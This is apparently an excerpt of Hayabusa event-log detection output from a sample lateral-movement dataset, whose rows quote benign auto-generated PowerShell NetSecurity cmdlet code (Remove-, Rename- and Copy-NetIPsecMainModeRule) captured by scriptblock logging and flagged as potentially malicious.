[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Gr",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"yStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' -Alias '*' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Gr",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"oup}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' -Alias '*' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, 